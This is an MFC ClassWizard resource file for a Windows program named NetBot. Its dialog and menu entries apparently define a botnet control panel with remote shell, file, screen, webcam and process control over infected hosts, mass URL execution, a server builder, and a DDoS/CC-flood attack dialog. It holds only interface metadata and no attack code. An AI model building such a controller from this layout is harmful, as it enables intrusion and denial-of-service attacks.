; CLW file contains information for the MFC ClassWizard

[General Info]
Version=1
LastClass=CNetBotDlg
LastTemplate=CListCtrl
NewFileInclude1=#include "stdafx.h"
NewFileInclude2=#include "NetBot.h"
LastPage=0

ClassCount=19
Class1=CFileDlg
Class2=CHelpDlg
Class3=CProcessDlg
Class4=CScreenDlg
Class5=CServerDlg
Class6=CSetDlg
Class7=CNetBotApp
Class8=CNetBotDlg
Class9=CShellDlg
Class10=CFileTranDlg
Class11=CUpdateDlg

ResourceCount=20
Resource1=IDD_SHELL_DLG
Resource2=IDD_SET_DLG
Resource3=IDR_MENU_FILERIGHT
Resource4=IDD_DIALOG1
Resource5=IDD_UPDATE_DLG
Resource6=IDR_MAINTOOLBAR
Resource7=IDD_SCREEN_DLG
Resource8=IDD_PROCESS_DLG
Resource9=IDD_SERVER_DLG
Resource10=IDD_NETBOT_DIALOG
Resource11=IDD_FILE_DLG
Resource12=IDR_MENU_ONLINE
Resource13=IDR_MENU_MAIN
Class12=CDDosDlg
Resource14=IDR_SHELL
Resource15=IDD_FILETRAN_DLG
Class13=CDownloadDlg
Class14=CUploadDlg
Resource16=IDD_VIDEO_DLG
Class15=CWaitListCtrl
Class16=CVideoDlg
Resource17=IDR_MENU_FILEVIEW
Class17=start
Resource18=IDD_DDOS_DLG
Resource19=IDR_FILE_TOOLBAR
Class18=logo
Class19=CSortListCtrl
Resource20=IDD_LOGO_DIALOG

[CLS:CFileDlg]
Type=0
BaseClass=CDialog
HeaderFile=FileDlg.h
ImplementationFile=FileDlg.cpp
LastObject=CFileDlg
Filter=D
VirtualFilter=dWC

[CLS:CHelpDlg]
Type=0
BaseClass=CDialog
HeaderFile=HelpDlg.h
ImplementationFile=HelpDlg.cpp

[CLS:CProcessDlg]
Type=0
BaseClass=CDialog
HeaderFile=ProcessDlg.h
ImplementationFile=ProcessDlg.cpp
Filter=D
VirtualFilter=dWC
LastObject=CProcessDlg

[CLS:CScreenDlg]
Type=0
BaseClass=CDialog
HeaderFile=ScreenDlg.h
ImplementationFile=ScreenDlg.cpp
Filter=D
VirtualFilter=dWC
LastObject=IDC_CHECK_CTRL

[CLS:CServerDlg]
Type=0
BaseClass=CDialog
HeaderFile=ServerDlg.h
ImplementationFile=ServerDlg.cpp
Filter=D
VirtualFilter=dWC
LastObject=IDC_URL

[CLS:CSetDlg]
Type=0
BaseClass=CDialog
HeaderFile=SetDlg.h
ImplementationFile=SetDlg.cpp
Filter=D
VirtualFilter=dWC
LastObject=CSetDlg

[CLS:CNetBotApp]
Type=0
BaseClass=CWinApp
HeaderFile=NetBot.h
ImplementationFile=NetBot.cpp
Filter=N
VirtualFilter=AC
LastObject=CNetBotApp

[CLS:CNetBotDlg]
Type=0
BaseClass=CDialog
HeaderFile=NetBotDlg.h
ImplementationFile=NetBotDlg.cpp
Filter=D
VirtualFilter=dWC
LastObject=ID_ONLINE_RESTART

[CLS:CShellDlg]
Type=0
BaseClass=CDialog
HeaderFile=ShellDlg.h
ImplementationFile=ShellDlg.cpp
Filter=D
VirtualFilter=dWC
LastObject=ID_S_ABOUT

[CLS:CUpdateDlg]
Type=0
BaseClass=CDialog
HeaderFile=UpdateDlg.h
ImplementationFile=UpdateDlg.cpp
Filter=D
VirtualFilter=dWC
LastObject=CUpdateDlg

[TB:IDR_FILE_TOOLBAR]
Type=1
Class=?
Command1=ID_FILE_BACKUP
Command2=ID_FILE_COPY
Command3=ID_FILE_PASTE
Command4=ID_FILE_DELETE
Command5=ID_FILE_UPLOAD
Command6=ID_FILE_DOWNLOAD
Command7=ID_FILE_REFURSH
Command8=ID_FILE_CHGVIEW
CommandCount=8

[MNU:IDR_MENU_FILEVIEW]
Type=1
Class=?
Command1=ID_MENU_FILEVIEW_BIG
Command2=ID_MENU_FILEVIEW_SMALL
Command3=ID_MENU_FILEVIEW_LIST
Command4=ID_MENU_FILEVIEW_DETAIL
CommandCount=4

[MNU:IDR_MENU_FILERIGHT]
Type=1
Class=CFileDlg
Command1=ID_FILE_RUNNORMAL
Command2=ID_FILE_RUNHIDE
Command3=ID_FILE_COPY
Command4=ID_FILE_PASTE
Command5=ID_FILE_DELETE
Command6=ID_FILE_UPLOAD
Command7=ID_FILE_DOWNLOAD
Command8=ID_FILE_REFURSH
CommandCount=8

[MNU:IDR_MENU_ONLINE]
Type=1
Class=CNetBotDlg
Command1=ID_ONLINE_FILEMANAGE
Command2=ID_ONLINE_SCREEN
Command3=ID_ONLINE_PROCESS
Command4=ID_ONLINE_SHELL
Command5=ID_ONLINE_VIDEO
Command6=ID_ONLINE_POWEROFF
Command7=ID_ONLINE_REBOOT
Command8=ID_ONLINE_LOGOFF
Command9=ID_ONLINE_UNINSTALL
Command10=ID_ONLINE_RESTART
CommandCount=10

[CLS:CDDosDlg]
Type=0
HeaderFile=DDosDlg.h
ImplementationFile=DDosDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=IDC_EDIT_CC_URL
VirtualFilter=dWC

[CLS:CDownloadDlg]
Type=0
HeaderFile=DownloadDlg.h
ImplementationFile=DownloadDlg.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=CDownloadDlg

[CLS:CUploadDlg]
Type=0
HeaderFile=UploadDlg.h
ImplementationFile=UploadDlg.cpp
BaseClass=CDialog
Filter=D
LastObject=CUploadDlg
VirtualFilter=dWC

[TB:IDR_MAINTOOLBAR]
Type=1
Class=?
Command1=ID_BTN_TONLINE
Command2=ID_BTN_TDDOS
Command3=ID_BTN_TFILETRAN
Command4=ID_BTN_TUPDATE
Command5=ID_BTN_TCONFIG
Command6=ID_BTN_TSERVER
Command7=ID_BTN_TWEBSITE
Command8=ID_BTN_TEXIT
CommandCount=8

[MNU:IDR_MENU_MAIN]
Type=1
Class=CNetBotDlg
Command1=ID_BTN_TUPDATE
Command2=ID_BTN_TSERVER
Command3=ID_BTN_TEXIT
Command4=ID_BTN_TFILETRAN
Command5=ID_BTN_TDDOS
Command6=ID_BTN_TCONFIG
Command7=ID_BTN_THELP
Command8=ID_BTN_TWEBSITE
CommandCount=8

[DLG:IDD_NETBOT_DIALOG]
Type=1
Class=CNetBotDlg
ControlCount=22
Control1=IDC_LIST_ONLINE,SysListView32,1350631425
Control2=IDC_STATIC,button,1342177287
Control3=IDC_RADIO1,button,1342177289
Control4=IDC_RADIO2,button,1342177289
Control5=IDC_RADIO3,button,1342177289
Control6=IDC_RADIO4,button,1342177289
Control7=IDC_RADIO5,button,1342177289
Control8=IDC_STATIC,static,1342308352
Control9=IDC_BTN_MULEXEC,button,1342242816
Control10=IDC_EXEC_URL,edit,1350631552
Control11=IDC_STATIC,static,1342308352
Control12=IDC_BTN_MULOPEN,button,1342242816
Control13=IDC_OPEN_URL,edit,1350631552
Control14=IDC_BTN_MULPOWEROFF,button,1342242816
Control15=IDC_BTN_MULREBOOT,button,1342242816
Control16=IDC_DLG_RECT,static,1207959559
Control17=IDC_STATIC,static,1342181380
Control18=IDC_STATIC,static,1342308352
Control19=IDC_STATIC,static,1342308352
Control20=IDC_STATIC,static,1342308352
Control21=IDC_BTN_SELNUM,button,1342242816
Control22=IDC_EDIT_SELNUM,edit,1350631552

[DLG:IDD_DDOS_DLG]
Type=1
Class=CDDosDlg
ControlCount=124
Control1=IDC_EDIT_IP1,edit,1350631552
Control2=IDC_EDIT_PORT1,edit,1350631552
Control3=IDC_COMBO_TYPE1,combobox,1344339971
Control4=IDC_EDIT_THREAD1,edit,1350762624
Control5=IDC_SPIN_THREAD1,msctls_updown32,1342177334
Control6=IDC_EDIT_NUM1,edit,1350762624
Control7=IDC_SPIN_NUM1,msctls_updown32,1342177334
Control8=IDC_BTN_ATTACK1,button,1342242816
Control9=IDC_BTN_STOP1,button,1342242816
Control10=IDC_STATIC,button,1342177287
Control11=IDC_STATIC,button,1342177287
Control12=IDC_STATIC,static,1342308352
Control13=IDC_STATIC,static,1342308352
Control14=IDC_STATIC,static,1342308352
Control15=IDC_STATIC,static,1342308352
Control16=IDC_STATIC,static,1342308352
Control17=IDC_STATIC,static,1342308352
Control18=IDC_STATIC,static,1342308352
Control19=IDC_STATIC,static,1342308352
Control20=IDC_STATIC,static,1342308352
Control21=IDC_STATIC,static,1342308352
Control22=IDC_STATIC,static,1342308352
Control23=IDC_STATIC,static,1342308352
Control24=IDC_STATIC,static,1342308352
Control25=IDC_STATIC,static,1342308352
Control26=IDC_STATIC,static,1342308352
Control27=IDC_STATIC,static,1342308352
Control28=IDC_STATIC,static,1342308352
Control29=IDC_STATIC,static,1342308352
Control30=IDC_STATIC,static,1342308352
Control31=IDC_STATIC,static,1342308352
Control32=IDC_STATIC,static,1342308352
Control33=IDC_STATIC,static,1342308352
Control34=IDC_STATIC,static,1342308352
Control35=IDC_STATIC,static,1342308352
Control36=IDC_LIST_LOG,listbox,1344340227
Control37=IDC_EDIT_IP,edit,1350631552
Control38=IDC_EDIT_PORT,edit,1350631552
Control39=IDC_COMBO_TYPE,combobox,1344339971
Control40=IDC_EDIT_THREAD,edit,1350762624
Control41=IDC_SPIN_THREAD,msctls_updown32,1342177334
Control42=IDC_BTN_ATTACK,button,1342242816
Control43=IDC_BTN_STOP,button,1342242816
Control44=IDC_STATIC,button,1342177287
Control45=IDC_STATIC,static,1342308352
Control46=IDC_STATIC,static,1342308352
Control47=IDC_STATIC,static,1342308352
Control48=IDC_STATIC,static,1342308352
Control49=IDC_STATIC,static,1342308352
Control50=IDC_STATIC,static,1342308352
Control51=IDC_STATIC,static,1342308352
Control52=IDC_STATIC,static,1342308352
Control53=IDC_STATIC,static,1342308352
Control54=IDC_STATIC,static,1342308352
Control55=IDC_STATIC,static,1342308352
Control56=IDC_STATIC,static,1342308352
Control57=IDC_STATIC,static,1342308352
Control58=IDC_EDIT_IP2,edit,1350631552
Control59=IDC_EDIT_PORT2,edit,1350631552
Control60=IDC_COMBO_TYPE2,combobox,1344339971
Control61=IDC_EDIT_THREAD2,edit,1350762624
Control62=IDC_SPIN_THREAD2,msctls_updown32,1342177334
Control63=IDC_EDIT_NUM2,edit,1350762624
Control64=IDC_SPIN_NUM2,msctls_updown32,1342177334
Control65=IDC_BTN_ATTACK2,button,1342242816
Control66=IDC_BTN_STOP2,button,1342242816
Control67=IDC_STATIC,static,1342308352
Control68=IDC_STATIC,static,1342308352
Control69=IDC_STATIC,static,1342308352
Control70=IDC_STATIC,static,1342308352
Control71=IDC_STATIC,static,1342308352
Control72=IDC_EDIT_IP3,edit,1350631552
Control73=IDC_EDIT_PORT3,edit,1350631552
Control74=IDC_COMBO_TYPE3,combobox,1344339971
Control75=IDC_EDIT_THREAD3,edit,1350762624
Control76=IDC_SPIN_THREAD3,msctls_updown32,1342177334
Control77=IDC_EDIT_NUM3,edit,1350762624
Control78=IDC_SPIN_NUM3,msctls_updown32,1342177334
Control79=IDC_BTN_ATTACK3,button,1342242816
Control80=IDC_BTN_STOP3,button,1342242816
Control81=IDC_STATIC,static,1342308352
Control82=IDC_STATIC,static,1342308352
Control83=IDC_STATIC,static,1342308352
Control84=IDC_STATIC,static,1342308352
Control85=IDC_STATIC,static,1342308352
Control86=IDC_EDIT_IP4,edit,1350631552
Control87=IDC_EDIT_PORT4,edit,1350631552
Control88=IDC_COMBO_TYPE4,combobox,1344339971
Control89=IDC_EDIT_THREAD4,edit,1350762624
Control90=IDC_SPIN_THREAD4,msctls_updown32,1342177334
Control91=IDC_EDIT_NUM4,edit,1350762624
Control92=IDC_SPIN_NUM4,msctls_updown32,1342177334
Control93=IDC_BTN_ATTACK4,button,1342242816
Control94=IDC_BTN_STOP4,button,1342242816
Control95=IDC_STATIC,static,1342308352
Control96=IDC_STATIC,static,1342308352
Control97=IDC_STATIC,static,1342308352
Control98=IDC_STATIC,static,1342308352
Control99=IDC_STATIC,static,1342308352
Control100=IDC_STATIC,static,1342308352
Control101=IDC_CHECK_AUTOATTACK,button,1342242819
Control102=IDC_CHECK_USESELECT,button,1342242819
Control103=IDC_EDIT_NUM,edit,1350762624
Control104=IDC_SPIN_NUM,msctls_updown32,1342177334
Control105=IDC_STATIC,static,1342308352
Control106=IDC_STATIC,button,1342177287
Control107=IDC_EDIT_CC_URL,edit,1350631552
Control108=IDC_EDIT_CC_PORT,edit,1350631552
Control109=IDC_EDIT_CC_THREAD,edit,1350762624
Control110=IDC_SPIN_CC_THREAD,msctls_updown32,1342177334
Control111=IDC_BTN_CC_ATTACK,button,1342242816
Control112=IDC_BTN_CC_STOP,button,1342242816
Control113=IDC_STATIC,static,1342308352
Control114=IDC_STATIC,static,1342308352
Control115=IDC_STATIC,static,1342308352
Control116=IDC_STATIC,static,1342308352
Control117=IDC_CHECK_CC_USESEL,button,1342242819
Control118=IDC_EDIT_CC_NUM,edit,1350762624
Control119=IDC_SPIN_CC_NUM,msctls_updown32,1342177334
Control120=IDC_STATIC,static,1342308352
Control121=IDC_EDIT_CC_PARAMX,edit,1350631552
Control122=IDC_EDIT_CC_PARAMY,edit,1350631552
Control123=IDC_STATIC,static,1342177284
Control124=IDC_STATIC,static,1342308352

[DLG:IDD_SET_DLG]
Type=1
Class=CSetDlg
ControlCount=11
Control1=IDC_STATIC,button,1342177287
Control2=IDC_BTN_SETSAVE1,button,1342242816
Control3=IDC_STATIC,static,1342308352
Control4=IDC_EDIT_LISTENPORT,edit,1350631552
Control5=IDC_STATIC,static,1342308352
Control6=IDC_EDIT_CONNECTMAX,edit,1350631552
Control7=IDC_STATIC,button,1342177287
Control8=IDC_BTN_SETSAVE4,button,1342242816
Control9=IDC_RADIO1,button,1342177289
Control10=IDC_RADIO2,button,1342177289
Control11=IDC_RADIO3,button,1342177289

[DLG:IDD_SERVER_DLG]
Type=1
Class=CServerDlg
ControlCount=17
Control1=IDC_OK,button,1342242816
Control2=IDC_STATIC,button,1342177287
Control3=IDC_STATIC,static,1342308352
Control4=IDC_RADIO1,button,1342308361
Control5=IDC_RADIO2,button,1342177289
Control6=IDC_RADIO3,button,1342177289
Control7=IDC_SERVERPROGRESS,msctls_progress32,1350565888
Control8=IDC_SVRLOG_LIST,listbox,1344340227
Control9=IDC_STATIC,static,1342181380
Control10=IDC_STATIC,static,1342308352
Control11=IDC_STATIC,static,1342308352
Control12=IDC_STATIC,static,1342308352
Control13=IDC_EDIT_NAME,edit,1350631552
Control14=IDC_EDIT_DISP,edit,1350631552
Control15=IDC_EDIT_DESC,edit,1350631552
Control16=IDC_EDIT_PORT,edit,1350631552
Control17=IDC_URL,combobox,1344340226

[DLG:IDD_UPDATE_DLG]
Type=1
Class=CUpdateDlg
ControlCount=31
Control1=IDC_STATIC,button,1342177287
Control2=IDC_STATIC,button,1342177287
Control3=IDC_STATIC,static,1342308352
Control4=IDC_EDIT_FTPIP,edit,1350631552
Control5=IDC_STATIC,static,1342308352
Control6=IDC_EDIT_FTPPORT,edit,1350631552
Control7=IDC_STATIC,static,1342308352
Control8=IDC_EDIT_FTPUSER,edit,1350631552
Control9=IDC_STATIC,static,1342308352
Control10=IDC_EDIT_FTPPASS,edit,1350631584
Control11=IDC_STATIC,static,1342181380
Control12=IDC_STATIC,static,1342308352
Control13=IDC_FTPURL,edit,1350631552
Control14=IDC_STATIC,static,1342181380
Control15=IDC_STATIC,static,1342308352
Control16=IDC_STATIC,static,1342308352
Control17=IDC_COMBO_FTPPORT,edit,1350631552
Control18=IDC_BTN_FTPUPDATE,button,1342242816
Control19=IDC_COMBO_FTPIP,combobox,1344340226
Control20=IDC_STATIC,static,1342308352
Control21=IDC_STATIC,static,1342308352
Control22=IDC_EDIT_DNSUSER,edit,1350631552
Control23=IDC_STATIC,static,1342308352
Control24=IDC_EDIT_DNSPASS,edit,1350631584
Control25=IDC_STATIC,static,1342181383
Control26=IDC_STATIC,static,1342308352
Control27=IDC_EDIT_DNSDOMAIN,edit,1350631552
Control28=IDC_STATIC,static,1342308352
Control29=IDC_COMBO_DNSIP,combobox,1344340226
Control30=IDC_BTN_DNSUPDATE,button,1342242816
Control31=IDC_STATIC_3322,static,1342308352

[DLG:IDD_SHELL_DLG]
Type=1
Class=CShellDlg
ControlCount=4
Control1=IDC_CMDEDIT,edit,1352733124
Control2=IDC_STATIC,static,1342308352
Control3=IDC_BTN_SHELLRUN,button,1342242816
Control4=IDC_COMBO_CMDLINE,combobox,1344339970

[DLG:IDD_SCREEN_DLG]
Type=1
Class=CScreenDlg
ControlCount=8
Control1=IDC_PROGRESS_SCREEN,msctls_progress32,1342177281
Control2=IDC_BTN_START,button,1342242816
Control3=IDC_RADIO_COLOR1,button,1342308361
Control4=IDC_RADIO_COLOR2,button,1342177289
Control5=IDC_RADIO_COLOR3,button,1342177289
Control6=IDC_RADIO_COLOR4,button,1342177289
Control7=IDC_CHECK_CTRL,button,1342242819
Control8=IDC_BTN_SAVEBMP,button,1342242816

[DLG:IDD_PROCESS_DLG]
Type=1
Class=CProcessDlg
ControlCount=3
Control1=IDC_PROCESS_LIST,SysListView32,1350631425
Control2=IDC_GETPROCESS_BTN,button,1342242816
Control3=IDC_KILLPROCESS_BTN,button,1342242816

[DLG:IDD_FILE_DLG]
Type=1
Class=CFileDlg
ControlCount=5
Control1=IDC_FILELIST,SysListView32,1350631685
Control2=IDC_EDIT_PATH,edit,1350631552
Control3=IDC_STATIC,static,1342308352
Control4=IDC_FILETREE,SysTreeView32,1350631427
Control5=IDC_BTN_ADDRGO,button,1342242816

[CLS:CWaitListCtrl]
Type=0
HeaderFile=WaitListCtrl.h
ImplementationFile=WaitListCtrl.cpp
BaseClass=CListCtrl
Filter=W
LastObject=CWaitListCtrl
VirtualFilter=FWC

[DLG:IDD_VIDEO_DLG]
Type=1
Class=CVideoDlg
ControlCount=3
Control1=IDC_PROGRESS_VIDEO,msctls_progress32,1342177281
Control2=IDC_BTN_RECORDS,button,1342242816
Control3=IDC_BTN_RECORDE,button,1342242816

[CLS:CVideoDlg]
Type=0
HeaderFile=VideoDlg.h
ImplementationFile=VideoDlg.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=CVideoDlg

[DLG:IDD_FILETRAN_DLG]
Type=1
Class=CFileTranDlg
ControlCount=1
Control1=IDC_TASK_LIST,SysListView32,1350631429

[CLS:CFileTranDlg]
Type=0
HeaderFile=FileTranDlg.h
ImplementationFile=FileTranDlg.cpp
BaseClass=CDialog
Filter=D
VirtualFilter=dWC
LastObject=IDC_TASK_LIST

[DLG:IDD_DIALOG1]
Type=1
Class=start
ControlCount=2
Control1=IDC_STATIC,static,1342177287
Control2=IDC_PIC,static,1342177806

[CLS:start]
Type=0
HeaderFile=start.h
ImplementationFile=start.cpp
BaseClass=CDialog
Filter=D
LastObject=start
VirtualFilter=dWC

[MNU:IDR_SHELL]
Type=1
Class=?
Command1=ID_S_SAVE
Command2=ID_S_CLEAR
Command3=ID_S_EXIT
Command4=ID_S_HELP
Command5=ID_S_ABOUT
CommandCount=5

[DLG:IDD_LOGO_DIALOG]
Type=1
Class=logo
ControlCount=1
Control1=IDC_STATIC,static,1342177294

[CLS:logo]
Type=0
HeaderFile=logo.h
ImplementationFile=logo.cpp
BaseClass=CDialog
Filter=D

[CLS:CSortListCtrl]
Type=0
HeaderFile=SortList.h
ImplementationFile=SortList.cpp
BaseClass=CListCtrl
Filter=W
LastObject=CSortListCtrl

